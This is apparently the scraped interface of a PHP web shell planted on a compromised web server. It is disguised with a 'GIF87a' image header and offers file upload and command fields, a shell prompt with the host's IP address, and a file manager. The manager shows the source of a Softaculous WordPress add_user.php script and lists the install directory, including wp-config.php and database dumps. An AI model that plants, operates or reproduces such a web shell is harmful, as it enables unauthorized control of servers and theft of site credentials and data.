GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@3.148.248.235: ~ $
<?php

@unlink(__FILE__);

// Validate if the request is from Softaculous
if($_REQUEST['pass'] != '[[autopass]]'){
	die("Unauthorized Access");
}

require_once('wp-blog-header.php');

$user_data = '[[user_data]]';
$user_data = unserialize($user_data);

$add = wp_insert_user($user_data);

$ret = array();

if(is_wp_error($add)){
	$ret['error'] = $add->get_error_messages();
}else{
	$ret['done'] = 1;
}

echo '<add_user>'.serialize($ret).'</add_user>';

exit(0);

Filemanager

Name Type Size Permission Actions
images Folder 0755
languages Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
plugins Folder 0755
.htaccess File 482 B 0644
_htaccess File 553 B 0644
_index.php File 59 B 0644
_wp-config.php File 3.05 KB 0644
add_user.php File 461 B 0644
backup.php File 3.04 KB 0644
check_charset.php File 2.02 KB 0644
clone.php File 30.85 KB 0644
clone.xml File 497 B 0644
edit.php File 8.97 KB 0644
edit.xml File 1.53 KB 0644
extend.php File 75.04 KB 0644
fileindex.php File 291 B 0644
import.php File 6.43 KB 0644
info.xml File 13.93 KB 0644
install.js File 924 B 0644
install.php File 27.78 KB 0644
install.xml File 4.96 KB 0644
md5 File 4.38 KB 0644
multisite.sql File 37.12 KB 0644
notes.txt File 5.88 KB 0644
plugin_activate.php File 596 B 0644
plugin_deactivate.php File 613 B 0644
post_download.json File 72 B 0644
sign_on.php File 2.87 KB 0644
soft.htaccess File 127 B 0644
upgrade.php File 13.4 KB 0644
upgrade.xml File 1.39 KB 0644
wp-cli File 6.19 MB 0755
wp-config.php File 2.76 KB 0644
wp.sql File 29.94 KB 0644
wp.zip File 22.83 MB 0644